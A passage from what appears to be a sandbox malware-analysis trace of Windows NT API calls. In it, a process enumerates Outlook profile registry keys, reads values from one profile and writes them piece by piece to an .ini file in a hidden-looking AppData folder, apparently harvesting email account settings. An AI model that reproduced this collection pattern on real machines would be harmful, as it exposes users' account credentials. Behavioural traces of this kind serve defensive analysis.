SecurityQualityOfService=0x0), IoStatusBlock=0x24e060, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e078*=0xffffffff, IoStatusBlock=0x24e060*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0106.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24e070, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.773] NtCreateFile (in: FileHandle=0x24e090, DesiredAccess=0x12019f, ObjectAttributes=0x24e058*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e078, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, 
EaLength=0x0 | out: FileHandle=0x24e090*=0xa4, IoStatusBlock=0x24e078*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0106.776] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x24e078, FileInformation=0x24dfd0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24e078, FileInformation=0x24dfd0) returned 0x0 [0106.781] NtWriteFile (in: FileHandle=0xa4, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24e078, Buffer=0x106960*, Length=0x28, ByteOffset=0x24dfe8*=0, Key=0x0 | out: IoStatusBlock=0x24e078, Buffer=0x106960*) returned 0x0 [0106.782] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0413e2ad850e7146953cbb4c2672287e", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.784] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.784] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.784] NtClose (Handle=0xa4) returned 0x0 [0106.784] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.784] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1b5aad0cdb629e49a2c6203d4a6a948a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1dab3177c2ac33448a4fe54b862a329e", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x5, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\2a7b899b94a04042a46a1cd96dc2a18c", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x6, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x7, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7a302ee0804dab4ba930ea4351b9b4ac", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x8, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7df1ae4ad074c146bb02f647b97dd78e", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.785] NtClose (Handle=0xa4) returned 0x0 [0106.785] NtEnumerateKey (in: KeyHandle=0x5c, Index=0x9, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.785] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.786] NtClose (Handle=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0x5c, Index=0xa, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.786] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x8000001a [0106.786] NtClose (Handle=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0x5c, Index=0xb, KeyInformationClass=0x0, KeyInformation=0x24dd30, Length=0x200, ResultLength=0x24e178 | out: KeyInformation=0x24dd30, ResultLength=0x24e178) returned 0x0 [0106.786] NtCreateKey (in: KeyHandle=0x24e184, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e184*=0xa4) returned 0x0 [0106.786] NtEnumerateKey (in: KeyHandle=0xa4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x24d930, Length=0x400, ResultLength=0x24e18c | out: KeyInformation=0x24d930, ResultLength=0x24e18c) returned 0x0 [0106.786] NtCreateKey (in: KeyHandle=0x24e180, DesiredAccess=0x20219, ObjectAttributes=0x24d4e8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e180*=0xa8) returned 0x0 [0106.789] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.789] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, 
ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.789] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.789] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0xc, ByteOffset=0x24d3b0*=40, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.789] NtClose (Handle=0xac) returned 0x0 [0106.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.789] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.789] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.789] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x52, ByteOffset=0x24d3b0*=52, Key=0x0 | out: 
IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.789] NtClose (Handle=0xac) returned 0x0 [0106.789] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.789] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.789] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.789] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.789] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x12, ByteOffset=0x24d3b0*=134, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.790] NtClose (Handle=0xac) returned 0x0 [0106.797] RtlIntegerToChar (in: Value=0x84c4e4be, Base=0x0, Length=0x20, String=0x24d498 | out: String="2227496126") returned 0x0 [0106.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", 
NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.797] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.798] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.798] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=152, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.798] NtClose (Handle=0xac) returned 0x0 [0106.798] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.798] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, 
ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.798] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.798] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x18, ByteOffset=0x24d3b0*=176, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.798] NtClose (Handle=0xac) returned 0x0 [0106.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.798] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.798] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, 
FileInformation=0x24d398) returned 0x0 [0106.798] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x14, ByteOffset=0x24d3b0*=200, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.798] NtClose (Handle=0xac) returned 0x0 [0106.798] NtEnumerateValueKey (in: KeyHandle=0xa8, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x24d530, Length=0x400, ResultLength=0x24e18c | out: KeyValueInformation=0x24d530, ResultLength=0x24e18c) returned 0x0 [0106.798] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtPathName=0x24d438, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.798] NtCreateFile (in: FileHandle=0x24d458, DesiredAccess=0x12019f, ObjectAttributes=0x24d420*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24d440, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24d458*=0xac, IoStatusBlock=0x24d440*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0106.799] NtQueryInformationFile (in: FileHandle=0xac, IoStatusBlock=0x24d440, FileInformation=0x24d398, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x24d440, FileInformation=0x24d398) returned 0x0 [0106.799] NtWriteFile (in: FileHandle=0xac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x24d440, Buffer=0x106960*, Length=0x1a, ByteOffset=0x24d3b0*=220, Key=0x0 | out: IoStatusBlock=0x24d440, Buffer=0x106960*) returned 0x0 [0106.799] NtClose (Handle=0xac) returned 0x0 [0106.799] RtlDosPathNameToNtPathName_U (in: 
